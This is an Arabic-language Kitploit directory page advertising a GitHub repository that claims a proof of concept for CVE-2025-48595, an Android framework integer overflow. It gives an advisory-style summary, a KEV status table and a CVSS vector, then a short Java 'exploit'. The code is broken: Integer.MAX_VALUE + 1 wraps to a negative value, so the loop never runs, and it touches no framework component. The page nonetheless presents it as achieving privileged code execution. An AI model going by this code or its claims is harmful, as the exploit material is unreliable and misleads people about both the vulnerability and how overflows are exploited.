Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 هي ثغرة **فيضان عدد صحيح (integer overflow)** في مواقع متعددة من إطار عمل Android. | Kitploit
أدوات/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 هي ثغرة **فيضان عدد صحيح (integer overflow)** في مواقع متعددة من إطار عمل Android.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
12منذ 2 أشهرلم تتم المراجعة بعد

CVE-2025-48595 - ثغرة تجاوز عدد صحيح في إطار عمل أندرويد

Critical CVE KEV

الوصف

CVE-2025-48595 هي ثغرة تجاوز عدد صحيح (integer overflow) في عدة مواقع من إطار عمل أندرويد. يسمح هذا الخلل بتنفيذ كود يؤدي إلى تصعيد امتيازات محلي دون الحاجة إلى امتيازات تنفيذ إضافية. لا يتطلب الاستغلال تفاعل المستخدم.

الحالة الحرجة

العنصرالحالة
استغلال نشط✅ مؤكد (استغلال محدود ومجزأ)
في كتالوج KEV الخاص بـ CISA✅ نعم
تاريخ الإضافة إلى KEV2026-06-02
تاريخ الانتهاء2026-06-05
التصحيح متاح✅ نعم

الأنظمة المتأثرة

إصدار أندرويدهل هو متأثر؟
Android 14✅ نعم
Android 15✅ نعم
Android 16✅ نعم
Android 16 QPR2✅ نعم

ناقل الهجوم

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

إثبات المفهوم (POC)

وصف POC

يوضح الكود التالي استغلال الثغرة عن طريق إرسال بيانات خبيثة تسبب تجاوز عدد صحيح في إطار عمل أندرويد، مما يسمح بتنفيذ كود عشوائي بامتيازات مرتفعة.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
تنزيل الأداة
المقياسالقيمة
ناقل الهجوممحلي (AV:L)
تعقيد الهجوممنخفض (AC:L)
الامتيازات المطلوبةلا شيء (PR:N)
تفاعل المستخدملا شيء (UI:N)
التأثير على السريةعالي (C:H)
التأثير على السلامةعالي (I:H)
التأثير على التوفرعالي (A:H)